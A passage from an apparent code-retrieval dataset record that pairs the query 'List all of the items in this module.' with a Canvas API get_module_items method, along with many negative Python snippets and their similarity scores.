curItem in self.scene.items():\n if not isinstance(curItem, DiagramItem):\n continue \n if curItem.itemId == int(id):\n itemFound = curItem\n break\n return itemFound", "def get(self, item_id, class_id):\n return get_item_info_with_spell(item_id, class_id)", "def get():\n id_num = int(input('Enter the ID number of the item you wish to retrieve\\n'))\n db_actions.retrieve(id_num)", "def edit(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def read(id):\n db = core.connect()\n return db[id]", "def get_volume_by_id(self, id):\n for vol in self.conn.volumes:\n if vol.id == id:\n return vol\n raise KeyError(\"Volume with ID \" + id + \" not found\")", "def getRawItem(self, itemID):\n data = self._client.Item.find(int(itemID))\n return data", "def getbyid(self, id):\n\n return esd.retrieve(id)", "def get_gallery_item(id):\n try:\n # HACK: Problem is that send_request prints the error message\n # from Imgur when it encounters an error. This is nice because\n # this error message is more descriptive than just the status\n # code that Requests give. But since we first assume the id\n # belong to an image, it means we will get an error whenever\n # the id belongs to an album. The following code temporarily\n # disables stdout to avoid give a cryptic and incorrect error.\n\n # Code for disabling stdout is from\n # http://coreygoldberg.blogspot.dk/2009/05/\n # python-redirect-or-turn-off-stdout-and.html\n original_stdout = sys.stdout # keep a reference to STDOUT\n sys.stdout = NullDevice() # redirect the real STDOUT\n return self.get_gallery_image(id)\n # TODO: Add better error codes so I don't have to do a catch-all\n except Exception:\n return self.get_gallery_album(id)\n finally:\n sys.stdout = original_stdout # turn STDOUT back on" ]
[ "0.7972377", "0.7206379", "0.7024295", "0.6994273", "0.6911595", "0.6899674", "0.6879004", "0.6836557", "0.6800232", "0.6766554", "0.6753238", "0.6743982", "0.66724145", "0.66661835", "0.6653945", "0.6582316", "0.6534913", "0.6518929", "0.650722", "0.6454686", "0.63841563", "0.6343775", "0.63201", "0.6318316", "0.6308917", "0.62988806", "0.62357605", "0.62301403", "0.6230102", "0.61630243", "0.61562884", "0.61514664", "0.6147706", "0.6146195", "0.6111075", "0.61068666", "0.61005014", "0.60830015", "0.6069796", "0.6054057", "0.60441744", "0.60321534", "0.6012151", "0.59798867", "0.597956", "0.5958915", "0.59577847", "0.59274006", "0.59128183", "0.58965325", "0.58932", "0.58891493", "0.58890307", "0.5878563", "0.58708006", "0.5868585", "0.58527315", "0.58456683", "0.58448905", "0.5844669", "0.58340055", "0.58340055", "0.58281577", "0.58276963", "0.58268696", "0.58195287", "0.5816448", "0.58159214", "0.5814733", "0.58038586", "0.58034295", "0.57984096", "0.5778446", "0.5771661", "0.5769644", "0.5767102", "0.57664484", "0.5750323", "0.5748446", "0.57476425", "0.57430255", "0.57370865", "0.57260257", "0.57247597", "0.57106185", "0.5709172", "0.5704329", "0.57032096", "0.57012063", "0.5695448", "0.5694019", "0.569259", "0.56910783", "0.56858695", "0.5685362", "0.5668616", "0.5666987", "0.56502855", "0.5647196", "0.56417984" ]
0.6082355
38
List all of the items in this module.
def get_module_items(self, **kwargs): return PaginatedList( ModuleItem, self._requester, "GET", "courses/{}/modules/{}/items".format(self.course_id, self.id), {"course_id": self.course_id}, _kwargs=combine_kwargs(**kwargs), )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_items(self):\n click.echo(\"ID --|-- Item Title\")\n for index, item in enumerate(self.items):\n click.echo(\" {} --|-- {}\".format(index, item.title))", "def get_all_items(self):\n return self.api.state['items']", "def all(self):\n return self.client.request_with_method(Methods.LIST % self.name)['items']", "def getAllItemsList():\n return Gw2Spidy._request('all-items', 'all')['results']", "def show_all(self):\n cmodules.showModuleData(\n Options.Author,\n Options.Name,\n Options.Call,\n Options.Category,\n Options.Type,\n Options.Version,\n Options.Description,\n Options.License,\n Options.Datecreation,\n Options.Lastmodified\n )\n self.show_commands()\n self.show_opt()", "def get_items(self):\n return self.item_list", "def show(self):\n return self.items", "def items(self) -> List:\n pass", "def get_items(self) -> list:\r\n return self._items", "def items():", "def get_items(self):\n return []", "def list(self):\n for item in self._config:\n item.list()", "def get_all(self):\n return self.__items", "def action_list(args):\n\n module_root = Path(\"modules/\")\n modules = load_modules(module_root)\n\n print(\"Available modules:\")\n for module in modules:\n print(f\"- {module}\")", "def items(self):", "def get_items(self):\n return self.items", "def list(self):", "def getAll(self):\n return self.__lst", "def getItems(self):\n for object in self.database:\n print(object)", "def items(self):\n return self.__items(())", "def items(self):\n return self._items", "def _list(self):\n raise NotImplementedError", "def list(self):\n return self._get_list()", "def allItems(self):\n items = []\n for itemType in self.__inventory__:\n for item in self.__inventory__[itemType]:\n items.append(item)\n return items", "def list(self):\n return self._list(self._path())", "def items(self) -> List[Item]:\n return self._items", "def display(self):\r\n\t\tfor each_item in self.items:\r\n\t\t\teach_item.display()", "def items(self):\n return list(self.items_generator())", "def print_items(self):\n for items in inventory:\n print(f\"- {items.upper()}\")", "def list(self):\n url = self._resource_name\n return self._get(url)", "def print_inventory(self):\r\n for item in self._inventory:\r\n print(item, '\\n')", "def print_list(self):\r\n pass", "def output_all_items(items):\n\n for item in items:\n print(item)", "def output_all_items(items):\n\n for item in items:\n print(item)", "def items(self):\n return [x.item for x in self]", "def list(self, *args):\n return []", "def displayable_items(self):\r\n return [self]", "def get_item_list(cls):\n if Item.__item_list is None:\n Item.__item_list = []\n return Item.__item_list", "def list(\n self,\n name,\n ):\n pass", "def getList(self):\n pass", "def list(self):\n return self.request(\"GET\")", "def do_list_items(self, arg):\n try:\n cprint (\"These are your items: \\n\", 'blue')\n my_items = arg[\"<all_items>\"]\n choice = arg[\"--choice\"]\n if choice == \"name\":\n my_items_str = \" \".join(my_items)\n print(my_items_str)\n elif choice == \"id\":\n my_items_str = int(\" \".join(my_items))\n print (my_items_str)\n app.ToDoApp.to_view_items(my_items_str)\n \n\n\n \n except ValueError as e:\n cprint((e), 'red')", "def get_module_info_list(self):\n self._get_module_info_list = pa_module_info_cb_t(self._module_info_cb)\n pa_context_get_module_info_list(self._context,\n self._get_module_info_list,\n None)", "def list(self) -> directory.Level.Listing:\n return self.Listing(self.tag.states)", "def list():", "def list():", "def getList(self):\n\treturn self.list", "def printall():\n print listAll()", "def get_items(self):\r\n return self.items()", "def getList(self):", "def getList(self):", "def get_items(self):\r\n item_list = []\r\n for item in self._inventory:\r\n item_list.append(item._name)\r\n return item_list", "def all_items_handler():\n items = getAllItems()\n return jsonify(items=[i.serialize for i in items])", "def all(cls):\n cls.logger.info(\"Processing all Shopcart Items\")\n return cls.query.order_by(cls.id).all()", "def getItemList(self):\r\n raise AbstractError\r\n return []", "def list(self):\n\n for name in self.projects:\n self.projects[name].show()\n print(\"\\n\")", "def get_items(self):\n return self.item_ids", "def list(self):\n return self.connection.get(self.service)", "def get_items():\n return requester.perform_request(Uri.items)", "def MODULES(self):\n pass", "def get_list(self):\n return self.__repository.get_all()", "def list():\n data = getInstaData()\n return render_template(\"list.html\", data=data)", "def _list_all(root_pkg, prog):\n res = \"\\n\".join(\n sorted(\n pkinspect.package_module_names(_import(root_pkg)),\n key=str.lower,\n ),\n )\n sys.stderr.write(f\"usage: {prog} module command [args...]\\nModules:\\n{res}\\n\")\n return 1", "def list(self):\n return [self.inUse, self.type, self.previousBlock, self.amount,\n self.blocks, self.nextBlock, self.items]", "def __call__(self):\n return self.get_items()", "def items(self, namespace):\n return ()", "def items(self) -> List[RadioStation]:\n return self._items", "def listing(self):\r\n listing = LinkListing(self.builder_obj, show_nums = self.show_nums)\r\n return listing.listing()", "def get_display_items(self):\r\n items = []\r\n for child in self.get_children():\r\n items.extend(child.displayable_items())\r\n\r\n return items", "def list(self):\n return self.objects.all()", "def items(self):\n\t\treturn self.config_parser.items(self.section_name)", "def getList(self):\n return self.list", "def getList(self):\n return self.list_", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"", "def items(self):\n return self.d.items()", "def items(self):\n return self.d.items()", "def get_items(self):\n return (item for item in self.items)", "def listModules(self):\n modules = [(module.name,\n module.queue,\n module.Active) for module in self.db.getModules()]\n return modules", "def items(self):\n return self._get_storage().items()", "def get_all(self):\n\n return self._items[:]", "def items(self):\n return self._as_dict().items()", "def print_items(items): \n print(items)", "def all_items(self) -> ItemGroup:\n return self.items + self.end_items", "def items(self):\r\n return self._as_dict().items()", "def return_items(self):\n cur = self.cursor\n cur.execute(f\"SELECT * FROM {self.product_name}\")\n products = cur.fetchall()\n return products", "def modules(self):\n return self._modules", "def items(self):\n return self._ctx.items()", "def print(self):\n print(\"Repository list: \")\n for repo in self.list:\n print(\"- \" + repo.name)", "def items(self):\n\n return ItemsView(self)", "def getAllItems(self):\n data = self._client.Item.filter(\n int(self.app_id), {\n 'limit': 500,\n# 'filters':[{\n# \"key\":\"96943879\", #En este pedazo se está filtrando sobre un campo, se quiere coger sólo a los\n# \"values\":[1],\n# }],\n },\n )[\"items\"]\n fields = [self.makeDict(item) for item in data]\n return fields", "def __repr__(self):\n return str(self.list_all())", "def items(self) -> List[InlineResponse200Items]:\n return self._items", "def print_all(self) -> None:\n\n print(\"title: \" + str(self.title))\n print(\"simple_title: \" + str(self.simple_title))\n print(\"info: \" + str(self.info))\n print(\"exists: \" + str(self.exists))\n print(\"categories: \" + str(self.categories))\n print(\"content: \" + str(self.content))", "def fill_item_list(self):\n return_list = []\n with Transaction().start(DBNAME, 1):\n self.productlist = self.Product.search([('description', '=', 'Stock'), ('type', '=', 'goods')])\n for i in self.productlist:\n return_list.append(i.template.name)\n return return_list", "def modules(self):\n return self._modules.keys()", "def items(self):\n return self._d.items()", "def list(self):\r\n return List(self)", "def list(self):\r\n return List(self)", "def list(self):\r\n return List(self)", "def get(self):\r\n return get_all()" ]
[ "0.7802198", "0.7336953", "0.7246295", "0.72275877", "0.72109777", "0.7051289", "0.70437056", "0.69722456", "0.6970122", "0.6892468", "0.6889149", "0.68333614", "0.68188065", "0.6816167", "0.6774345", "0.67634386", "0.6754438", "0.6714948", "0.6712662", "0.6659909", "0.6640903", "0.66251624", "0.6610916", "0.6562578", "0.6554867", "0.6554262", "0.65502965", "0.65140307", "0.64909637", "0.6486898", "0.6481435", "0.6470067", "0.64375126", "0.64375126", "0.642825", "0.64244145", "0.64214605", "0.6411049", "0.63991576", "0.6368218", "0.6359711", "0.635356", "0.6289381", "0.6282647", "0.6257555", "0.6257555", "0.6254339", "0.6250409", "0.62351966", "0.6234519", "0.6234519", "0.6232652", "0.6221857", "0.62004685", "0.6193009", "0.6188063", "0.61735976", "0.6158342", "0.6156667", "0.61541396", "0.614771", "0.6144253", "0.61409616", "0.61376786", "0.61315346", "0.61279494", "0.6127021", "0.6124703", "0.6100938", "0.6098679", "0.6091524", "0.6085824", "0.6082294", "0.60807055", "0.6065784", "0.6065784", "0.60589296", "0.6056197", "0.60471255", "0.6041517", "0.60412824", "0.60364217", "0.60245585", "0.6014401", "0.60111797", "0.6008404", "0.6007108", "0.60050344", "0.60020745", "0.5982931", "0.59787494", "0.5975093", "0.59727544", "0.5972399", "0.5959726", "0.59518015", "0.5948056", "0.5948056", "0.5948056", "0.5944547" ]
0.6004262
88
Reset module progressions to their default locked state and recalculates them based on the current requirements. Adding progression requirements to an active course will not lock students out of modules they have already unlocked unless this action is called.
def relock(self, **kwargs): response = self._requester.request( "PUT", "courses/{}/modules/{}/relock".format(self.course_id, self.id), _kwargs=combine_kwargs(**kwargs), ) module_json = response.json() module_json.update({"course_id": self.course_id}) return Module(self._requester, module_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def action_lock(self):\n self.state = 'locked'", "def _reset_module_attempts(studentmodule):\r\n # load the state json\r\n problem_state = json.loads(studentmodule.state)\r\n # old_number_of_attempts = problem_state[\"attempts\"]\r\n problem_state[\"attempts\"] = 0\r\n\r\n # save\r\n studentmodule.state = json.dumps(problem_state)\r\n studentmodule.save()", "def applyLock(self, pkmn):\n pkmn.actionLock = ActionLock(pkmn, \\\n pkmn.lastAction, self.turns-1)", "def set_status(self, locked=None, exclusive=None):\n self.locked = locked\n self.exclusive = exclusive", "def reset_attempts_module_state(xmodule_instance_args, _module_descriptor, student_module):\r\n update_status = UPDATE_STATUS_SKIPPED\r\n problem_state = json.loads(student_module.state) if student_module.state else {}\r\n if 'attempts' in problem_state:\r\n old_number_of_attempts = problem_state[\"attempts\"]\r\n if old_number_of_attempts > 0:\r\n problem_state[\"attempts\"] = 0\r\n # convert back to json and save\r\n student_module.state = json.dumps(problem_state)\r\n student_module.save()\r\n # get request-related tracking information from args passthrough,\r\n # and supplement with task-specific information:\r\n track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)\r\n event_info = {\"old_attempts\": old_number_of_attempts, \"new_attempts\": 0}\r\n track_function('problem_reset_attempts', event_info)\r\n update_status = UPDATE_STATUS_SUCCEEDED\r\n\r\n return update_status", "def reset(self, data):\r\n ugettext = self.system.service(self, \"i18n\").ugettext\r\n if self.state != self.DONE:\r\n if not self.ready_to_reset:\r\n return self.out_of_sync_error(data)\r\n success, can_reset, error = self.check_if_student_has_done_needed_grading()\r\n if not can_reset:\r\n return {'error': error, 'success': False}\r\n if self.student_attempts >= self.max_attempts - 1:\r\n if self.student_attempts == self.max_attempts - 1:\r\n self.student_attempts += 1\r\n return {\r\n 'success': False,\r\n # This is a student_facing_error\r\n 'error': ugettext(\r\n 'You have attempted this question {number_of_student_attempts} times. '\r\n 'You are only allowed to attempt it {max_number_of_attempts} times.'\r\n ).format(\r\n number_of_student_attempts=self.student_attempts,\r\n max_number_of_attempts=self.max_attempts\r\n )\r\n }\r\n self.student_attempts +=1\r\n self.state = self.INITIAL\r\n self.ready_to_reset = False\r\n for i in xrange(len(self.task_xml)):\r\n self.current_task_number = i\r\n self.setup_next_task(reset=True)\r\n self.current_task.reset(self.system)\r\n self.task_states[self.current_task_number] = self.current_task.get_instance_state()\r\n self.current_task_number = 0\r\n self.ready_to_reset = False\r\n\r\n self.setup_next_task()\r\n return {'success': True, 'html': self.get_html_nonsystem()}", "def reset(self):\n self._open_activity_count = 0\n self._decisions = []\n self._tasks = TaskRegistry()", "def reset_progress(self):\n self.state = \"\"", "def prepareFinishSlot(self):\r\n \r\n self.lockIndex = self._wizard.targetIndexes[0]\r\n self._targetRepositoryModel.lock([self.lockIndex])", "def reactivate(self):\n self.write({'active': True, 'state': 'running'})\n STAGE = self.env['anytracker.stage']\n for ticket in self:\n starts = STAGE.search([('method_id', '=', ticket.method_id.id),\n ('progress', '=', 0)])\n if len(starts) != 1:\n raise except_orm(\n _('Configuration error !'),\n _('One and only one stage should have a 0% progress'))\n # write stage in a separate line to recompute progress & risk\n ticket.write({'stage_id': starts[0].id})\n self.recompute_parents()", "def processLock(self):\r\n self.controller.executionLock()", "def _reset_block_validation_penalty(cls, context: 'IconScoreContext'):\n\n for prep in context.preps:\n if prep.penalty == PenaltyReason.BLOCK_VALIDATION and prep.status == PRepStatus.ACTIVE:\n dirty_prep = context.get_prep(prep.address, mutable=True)\n dirty_prep.reset_block_validation_penalty()\n context.put_dirty_prep(dirty_prep)\n\n context.update_dirty_prep_batch()", "def fix_locked_default_shader(progress_controller=None):\n if progress_controller is None:\n progress_controller = ProgressControllerBase()\n pm.lockNode(\"initialShadingGroup\", l=0, lockUnpublished=0)\n progress_controller.complete()", "def lock_table(self):\n\n self.status = 'Locked'", "def _stage1(self):\n self.start_progress()\n tasks = list(self._chain_dict(self._model.adjust_tasks))\n if len(tasks) == 0:\n self._stage2(self._no_adjustments_case())\n else:\n task = lambda : self._run_adjust_tasks(tasks)\n locator.get(\"pool\").submit(task, self._stage2)", "def _dummy_schedule(progress_remaining: float) -> float:\n del progress_remaining\n return 0.0", "def _module_toggled(self, module, required):\n\n self._set_implicit_requirements()\n\n if required:\n self.project.pyqt_modules.append(module)\n else:\n self.project.pyqt_modules.remove(module)\n\n self.project.modified = True", "def locked(self, locked):\n\n self._locked = locked", "def locked(self, locked):\n\n self._locked = locked", "def freeze(self,):\n if self.frozen: return\n\n self.id_lock.acquire()\n #Set logfile to None. Put current logfile into wait for chkpt state.\n self._rotatelog(None,\"\")\n self.loglocker.acquire_write()\n self.frozen = True", "def enable_freeze(self):\n n_t_t = 0\n n_l = 0\n if self.tree_ctrl_theory is not None:\n n_t_t = self.tree_ctrl_theory.GetCount()\n n_l = len(self.list_cb_theory)\n if (n_t_t + n_l > 0):\n self.bt_freeze.Enable()\n else:\n self.bt_freeze.Disable()", "def submit_reset_problem_attempts_for_all_students(request, usage_key): # pylint: disable=invalid-name\r\n # check arguments: make sure that the usage_key is defined\r\n # (since that's currently typed in). If the corresponding module descriptor doesn't exist,\r\n # an exception will be raised. Let it pass up to the caller.\r\n modulestore().get_item(usage_key)\r\n\r\n task_type = 'reset_problem_attempts'\r\n task_class = reset_problem_attempts\r\n task_input, task_key = encode_problem_and_student_input(usage_key)\r\n return submit_task(request, task_type, task_class, usage_key.course_key, task_input, task_key)", "def reset() -> None:\n Resources.total = dict(jobs=os.cpu_count() or 1)\n Resources.available = Resources.total.copy()\n Resources.default = dict(jobs=1)\n Resources.condition = asyncio.Condition()", "def requirements_fuse_counters(self) -> List[Counter[GriddedPerm]]:\n if self._requirements_fuse_counters is not None:\n return self._requirements_fuse_counters\n counters = [\n self._fuse_counter(req_list)\n for req_list in self._tiling.requirements\n if not self.is_positive_left_or_right_requirement(req_list)\n ]\n self._requirements_fuse_counters = counters\n return self._requirements_fuse_counters", "def reset_continued(self): \n self._recent_goal_continued = False\n self._update_action = False\n self._update_action_without_pause = False", "def mark_as_not_done(self):\n grade_event = {'value': 0, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def update_state(self, progress, policy_state=None):\n raise NotImplementedError", "def update_waiting(self):\n if self.get_value(0) is None:\n self.set_value(True, 0)\n else:\n self.set_value(not bool(self.get_value(0)), 0)\n self.state = ACTIVE", "def set_progress(self, progress: float):", "def f_lock(self):\n self._locked = True", "def reset_student_attempts(course_id, student, module_state_key, delete_module=False):\r\n # Reset the student's score in the submissions API\r\n # Currently this is used only by open assessment (ORA 2)\r\n # We need to do this *before* retrieving the `StudentModule` model,\r\n # because it's possible for a score to exist even if no student module exists.\r\n if delete_module:\r\n sub_api.reset_score(\r\n anonymous_id_for_user(student, course_id),\r\n course_id.to_deprecated_string(),\r\n module_state_key.to_deprecated_string(),\r\n )\r\n\r\n module_to_reset = StudentModule.objects.get(\r\n student_id=student.id,\r\n course_id=course_id,\r\n module_state_key=module_state_key\r\n )\r\n\r\n if delete_module:\r\n module_to_reset.delete()\r\n else:\r\n _reset_module_attempts(module_to_reset)", "def check_prerequisites(self):\n self.courses_not_completed = self.prerequisite_set - set(self.user_courses.keys())", "def test_recalculate_progress(self):\n self._build_sample_graph()\n self._create_lessons() # 3 lessons in unit 1\n self.student = models.Student(user_id='1')\n self._create_linear_progress() # Lesson 1 and 2 completed\n self.lesson1.properties[SKILLS_KEY] = [self.sa.id]\n self.lesson2.properties[SKILLS_KEY] = [self.sb.id]\n self.lesson3.properties[SKILLS_KEY] = [self.sa.id,\n self.sc.id]\n self.course.save()\n\n tracker = SkillCompletionTracker(self.course)\n lprogress_tracker = UnitLessonCompletionTracker(self.course)\n lprogress = lprogress_tracker.get_or_create_progress(self.student)\n expected = {\n self.sa: tracker.IN_PROGRESS,\n self.sb: tracker.COMPLETED,\n self.sc: tracker.NOT_ATTEMPTED\n }\n for skill, expected_progress in expected.iteritems():\n self.assertEqual(expected_progress,\n tracker.recalculate_progress(lprogress_tracker,\n lprogress, skill))", "def set_task_in_progress(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 1)\n\n # Refresh the table\n self.write_tasks_table()", "def test_progress(self):\n # A requires a certain object in inventory\n self._fulfillA()\n self.character.quests.progress()\n self.assertEqual(self._get_quest().current_step, \"B\")\n\n # B requires progress be called with specific kwarg\n # should not step (no kwarg)\n self.character.quests.progress()\n self.assertEqual(self._get_quest().current_step, \"B\")\n\n # should step (kwarg sent)\n self.character.quests.progress(complete_quest_B=True)\n self.assertEqual(self._get_quest().current_step, \"C\")\n\n # C requires a counter Attribute on char be high enough\n self._fulfillC()\n self.character.quests.progress()\n self.assertEqual(self._get_quest().current_step, \"C\") # still on last step\n self.assertEqual(self._get_quest().is_completed, True)", "def reset_student_attempts(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n course = get_course_with_access(\r\n request.user, 'staff', course_id, depth=None\r\n )\r\n\r\n problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))\r\n student_identifier = request.GET.get('unique_student_identifier', None)\r\n student = None\r\n if student_identifier is not None:\r\n student = get_student_from_identifier(student_identifier)\r\n all_students = request.GET.get('all_students', False) in ['true', 'True', True]\r\n delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]\r\n\r\n # parameter combinations\r\n if all_students and student:\r\n return HttpResponseBadRequest(\r\n \"all_students and unique_student_identifier are mutually exclusive.\"\r\n )\r\n if all_students and delete_module:\r\n return HttpResponseBadRequest(\r\n \"all_students and delete_module are mutually exclusive.\"\r\n )\r\n\r\n # instructor authorization\r\n if all_students or delete_module:\r\n if not has_access(request.user, 'instructor', course):\r\n return HttpResponseForbidden(\"Requires instructor access.\")\r\n\r\n try:\r\n module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)\r\n except InvalidKeyError:\r\n return HttpResponseBadRequest()\r\n\r\n response_payload = {}\r\n response_payload['problem_to_reset'] = problem_to_reset\r\n\r\n if student:\r\n try:\r\n enrollment.reset_student_attempts(course_id, student, module_state_key, delete_module=delete_module)\r\n except StudentModule.DoesNotExist:\r\n return HttpResponseBadRequest(_(\"Module does not exist.\"))\r\n except sub_api.SubmissionError:\r\n # Trust the submissions API to log the error\r\n error_msg = _(\"An error occurred while deleting the score.\")\r\n return HttpResponse(error_msg, status=500)\r\n response_payload['student'] = student_identifier\r\n elif all_students:\r\n instructor_task.api.submit_reset_problem_attempts_for_all_students(request, module_state_key)\r\n response_payload['task'] = 'created'\r\n response_payload['student'] = 'All Students'\r\n else:\r\n return HttpResponseBadRequest()\r\n\r\n return JsonResponse(response_payload)", "def update_waiting(self):\n if self.get_value(0) is None:\n self.set_value(False, 0)\n else:\n self.set_value(bool(self.get_value(0)), 0)\n self.state = ACTIVE", "def reset_task_state(self, message=\"\"):\r\n info_message = \"Combined open ended user state for user {0} in location {1} was invalid. It has been reset, and you now have a new attempt. {2}\".format(self.system.anonymous_student_id, self.location.to_deprecated_string(), message)\r\n self.current_task_number = 0\r\n self.student_attempts = 0\r\n self.old_task_states.append(self.task_states)\r\n self.task_states = []\r\n log.info(info_message)", "def reset(self):\r\n\t\tself.player_selected_actions = np.zeros((self.num_actions,), int)\r\n\t\tself.player_reward = np.zeros((self.num_timesteps,))\r\n\t\tself.player_optimum = np.zeros_like(self.player_reward, dtype=int)", "def backfill (self):\n mods = self.get_mods_instance()\n # if self.verbose:\n # print 'BEFORE'\n # mods.show_notes()\n try:\n mods.do_back_fill(self.award_ids)\n # print mods\n # print 'AFTER'\n # mods.show_notes()\n except:\n print 'ERROR: {}'.format(sys.exc_info()[1])\n traceback.print_exc()", "def setLocked(self, value):\n for attr in self._filter():\n attr.setLocked(value)", "def calculations(self):\n self.prerequisite_set = get_prerequisites(self.major, self.major2)\n self.check_prerequisites()\n self.get_requirements_for_majors()", "def test_enable_section_by_progress_linear_flow(self):\n\n self.launchSurvey(\"test_progress_value_source_section_enabled_no_hub\")\n\n self.assertInBody(\"Section 1 Question 1\")\n self.post({\"s1-b1-q1-a1\": 1})\n\n self.assertInBody(\"Section 1 Question 2\")\n self.post({\"s1-b2-q1-a1\": 1})\n\n self.assertInBody(\"Section 2 Question 1\")\n self.post({\"s2-b1-q1-a1\": 1})", "def spinlocks(self, spinlocks):\n\n self._spinlocks = spinlocks", "def check_requirements(self):\n # first, separate plugins based on those with and without dependeices.\n remaining = set()\n loaded = set()\n\n for k, v in self.modules.items():\n if v.requirements:\n remaining.add(v)\n else:\n loaded.add(k)\n self.module_call_order.append(v)\n\n for r in remaining:\n # first we check to make sure that all dependencies are satisfied.\n if not self.dependencies_satisfied(r):\n raise Exception(f\"Oops! Module {r} is not satisfied! It desires: {r.requirements}\")\n\n # now confident that all versions check out, arrange the plugins into a suitable load order.\n # no reason to do anything fancy without requirements though.\n if not remaining:\n return\n\n while True:\n new_remaining = remaining.copy()\n for m in remaining:\n if loaded.issuperset({r for r in m.requirements.keys()}):\n new_remaining.remove(m)\n loaded.add(m.name)\n self.module_call_order.append(m)\n if len(new_remaining) < len(remaining):\n # this is good.. we made progress!\n remaining = new_remaining\n if not remaining:\n # hooray! No more plugins to process\n break\n else:\n # this is bad. we are not making progress.\n raise Exception(\"dependency load order is not progressing!\")", "def reset(self):\n self.num_steps = 0\n self.world_state = self.action = None", "def do_workload(self):\n module_manager = self._core.get_module_manager()\n module = module_manager.get_module_by_name(self._values[\"name\"])\n module_manager.update_module(module)", "def update_task_progress():\r\n current_time = datetime.now(UTC)\r\n progress = {\r\n 'action_name': action_name,\r\n 'attempted': num_attempted,\r\n 'succeeded': num_succeeded,\r\n 'failed': num_failed,\r\n 'total': num_total,\r\n 'duration_ms': int((current_time - start_time).total_seconds() * 1000),\r\n 'step': curr_step,\r\n }\r\n _get_current_task().update_state(state=PROGRESS, meta=progress)\r\n\r\n return progress", "def action_locked_temporarily(self, cr, uid, ids, context=None):\n if self.pool.get('account.period').search(cr, uid, [('state','=','draft'),('fiscalyear_id','in',ids)], context=context):\n raise orm.except_orm(_('Error'), _('You Must Close Open Periods First'))\n return self.write(cr, uid, ids, {'state': 'locked_temp'}, context=context)", "def reset_modules(self) -> None:\n self.modules = {}\n self.update_modules()\n self.parse_modules()", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n warnings.warn(\n 'Learning rate reduction mode %s is unknown, '\n 'fallback to auto mode.' % self.mode\n )\n self.mode = 'auto'\n if self.mode == 'min' or (\n self.mode == 'auto' and 'acc' not in self.monitor\n ):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def clear_user_module_score(self, user):\r\n self.set_user_module_score(user, None, None)", "def reset(self):\n self.dict_lock.acquire()\n self.list_lock.acquire()\n\n self.beginResetModel()\n self.levels_dict = {}\n self.view_list = []\n self.endResetModel()\n \n self.list_lock.release()\n self.dict_lock.release()", "def reset_status(self):\r\n self.ship_left = self.ai_settings.ship_limit\r\n self.score = 0\r\n self.level = 1", "def _setProgress(self):\n\n self.progress = (self.iteration, self.iterationCount)", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def progressions(self, progressions):\n\n self._progressions = progressions", "def progressions(self, progressions):\n\n self._progressions = progressions", "def f_unlock(self):\n self._locked = False", "def reset_update_lock(self):\n self.lock = False\n self.last_lock_time = None", "def reset(self):\n self.state = EvaluationState.ready\n\n for child in self.children:\n if hasattr(child, \"reset\"):\n child.reset()", "def lock (self):\n self.locked = True\n self._changed = False", "def incAvailProcSlots(self):\n\n\t\t# Acquire a lock\n\t\tself.lock()\n\n\t\t# Read number of currently executing processes\n\t\tc0 = self.getAvailProcSlots()\n\n\t\tc1 = c0 + 1\n\t\tself.lockfile.seek(0)\n\t\tself.lockfile.write('%04d\\n' % c1)\n\t\tself.lockfile.flush()\n\t\t# Unlock semaphore\n\t\tself.unlock()", "def mod_complete(self):\n raise NotImplementedError(\"Mod complete isn't overriden\")", "def resetDefences(self):\n self.currentAP = self.maxAP\n self.currentSP = self.maxSP", "def perform_module_state_update(update_fcn, filter_fcn, _entry_id, course_id, task_input, action_name):\r\n # get start time for task:\r\n start_time = time()\r\n\r\n usage_key = course_id.make_usage_key_from_deprecated_string(task_input.get('problem_url'))\r\n student_identifier = task_input.get('student')\r\n\r\n # find the problem descriptor:\r\n module_descriptor = modulestore().get_item(usage_key)\r\n\r\n # find the module in question\r\n modules_to_update = StudentModule.objects.filter(course_id=course_id, module_state_key=usage_key)\r\n\r\n # give the option of updating an individual student. If not specified,\r\n # then updates all students who have responded to a problem so far\r\n student = None\r\n if student_identifier is not None:\r\n # if an identifier is supplied, then look for the student,\r\n # and let it throw an exception if none is found.\r\n if \"@\" in student_identifier:\r\n student = User.objects.get(email=student_identifier)\r\n elif student_identifier is not None:\r\n student = User.objects.get(username=student_identifier)\r\n\r\n if student is not None:\r\n modules_to_update = modules_to_update.filter(student_id=student.id)\r\n\r\n if filter_fcn is not None:\r\n modules_to_update = filter_fcn(modules_to_update)\r\n\r\n # perform the main loop\r\n num_attempted = 0\r\n num_succeeded = 0\r\n num_skipped = 0\r\n num_failed = 0\r\n num_total = modules_to_update.count()\r\n\r\n def get_task_progress():\r\n \"\"\"Return a dict containing info about current task\"\"\"\r\n current_time = time()\r\n progress = {'action_name': action_name,\r\n 'attempted': num_attempted,\r\n 'succeeded': num_succeeded,\r\n 'skipped': num_skipped,\r\n 'failed': num_failed,\r\n 'total': num_total,\r\n 'duration_ms': int((current_time - start_time) * 1000),\r\n }\r\n return progress\r\n\r\n task_progress = get_task_progress()\r\n _get_current_task().update_state(state=PROGRESS, 